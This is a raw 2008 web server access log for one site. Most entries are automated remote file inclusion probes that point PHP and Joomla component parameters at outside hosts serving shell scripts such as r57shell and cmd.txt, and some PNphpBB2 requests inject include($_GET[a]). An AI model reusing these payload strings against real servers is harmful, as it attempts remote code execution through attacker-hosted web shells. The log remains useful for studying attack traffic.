67.15.78.65 - - [14/Feb/2008:08:06:33 -0800] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.51.87.246 - - [14/Feb/2008:08:07:25 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.73.5.183 - - [14/Feb/2008:08:07:39 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [14/Feb/2008:08:07:50 -0800] "GET /logs/access_080120.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [14/Feb/2008:08:07:51 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.32.96.7 - - [14/Feb/2008:08:07:51 -0800] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.13.86.150 - - [14/Feb/2008:08:08:11 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:51 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:51 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:52 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:52 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:52 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:08:53 -0800] "GET /logs/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
83.19.144.26 - - [14/Feb/2008:08:09:09 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.32.96.7 - - [14/Feb/2008:08:09:59 -0800] "GET /logs/access_071221.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.215.230.140 - - [14/Feb/2008:08:10:11 -0800] "GET /logs/access_080122.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [14/Feb/2008:08:10:12 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [14/Feb/2008:08:10:13 -0800] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.74.40 - - [14/Feb/2008:08:10:44 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:11:07 -0800] "GET /convert/mvcw.php?vwar_root=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:11:07 -0800] "GET /convert/mvcw.php?vwar_root=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:11:07 -0800] "GET /convert/mvcw.php?vwar_root=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.59.23.86 - - [14/Feb/2008:08:11:59 -0800] "GET /logs/access_080117.log/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.59.23.86 - - [14/Feb/2008:08:11:59 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.59.23.86 - - [14/Feb/2008:08:12:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:12:15 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
85.119.157.77 - - [14/Feb/2008:08:12:15 -0800] "GET /logs/access_080121.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
86.59.23.86 - - [14/Feb/2008:08:12:27 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:08:12:31 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:08:12:42 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.146.33.210 - - [14/Feb/2008:08:12:42 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:08:13:15 -0800] "GET /logs/access_080122.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:08:13:15 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:08:13:21 -0800] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:13:27 -0800] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:13:30 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:13:32 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 35262 "-" "libwww-perl/5.79" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:13:33 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:13:33 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [14/Feb/2008:08:13:34 -0800] "GET /ipblock.inc.php?path_escape=http://www.jested.net/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:08:13:50 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
205.234.222.47 - - [14/Feb/2008:08:13:50 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:08:14:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.72.15 - - [14/Feb/2008:08:14:47 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.89.74.40 - - [14/Feb/2008:08:15:39 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:15:40 -0800] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:15:42 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:15:44 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 35262 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:16:03 -0800] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:16:05 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.72.15 - - [14/Feb/2008:08:16:06 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
60.50.144.64 - - [14/Feb/2008:08:16:08 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.78.65 - - [14/Feb/2008:08:17:27 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:18:28 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:18:28 -0800] "GET ///modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:18:38 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:18:38 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:08:19:18 -0800] "GET /logs/access_080117.log/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:08:19:18 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:08:19:18 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.59.23.86 - - [14/Feb/2008:08:19:32 -0800] "GET /logs/access_080130.log/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.215.230.140 - - [14/Feb/2008:08:19:46 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.87.246 - - [14/Feb/2008:08:20:46 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.96.56 - - [14/Feb/2008:08:21:39 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.96.56 - - [14/Feb/2008:08:21:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.96.56 - - [14/Feb/2008:08:21:40 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.143 - - [14/Feb/2008:08:21:43 -0800] "GET /logs/access_080110.log HTTP/1.0" 200 682778 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:08:21:44 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:08:21:44 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:08:21:45 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.123.27.136 - - [14/Feb/2008:08:22:23 -0800] "GET /logs/access_080111.log/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.32.96.7 - - [14/Feb/2008:08:23:13 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.78.65 - - [14/Feb/2008:08:23:19 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.77.96.56 - - [14/Feb/2008:08:24:29 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.215.230.140 - - [14/Feb/2008:08:24:50 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [14/Feb/2008:08:24:53 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:08:26:44 -0800] "GET /logs/access_070825.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:08:26:45 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [14/Feb/2008:08:26:45 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:08:27:14 -0800] "GET /logs/access_080130.log/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.40 - - [14/Feb/2008:08:28:42 -0800] "GET /logs/access_070825.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.40 - - [14/Feb/2008:08:28:42 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.40 - - [14/Feb/2008:08:28:43 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 200 34548 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:29:09 -0800] "GET /logs/access_080103.log///modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:29:09 -0800] "GET /logs///modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [14/Feb/2008:08:29:49 -0800] "GET /logs/access_080122.log///modules/Neos_Chronos/header.php?base_folder=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.95.226.38 - - [14/Feb/2008:08:30:55 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
71.95.226.38 - warboard [14/Feb/2008:08:31:01 -0800] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
77.221.130.5 - - [14/Feb/2008:08:32:55 -0800] "GET /account.php?action=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.167.251 - - [14/Feb/2008:08:34:34 -0800] "GET /logs/access_071225.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.20.225 - - [14/Feb/2008:08:35:10 -0800] "GET /megumi/earrings/?N=D HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:08:37:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:08:37:08 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:08:37:08 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:08:38:42 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:38:58 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:08:38:58 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
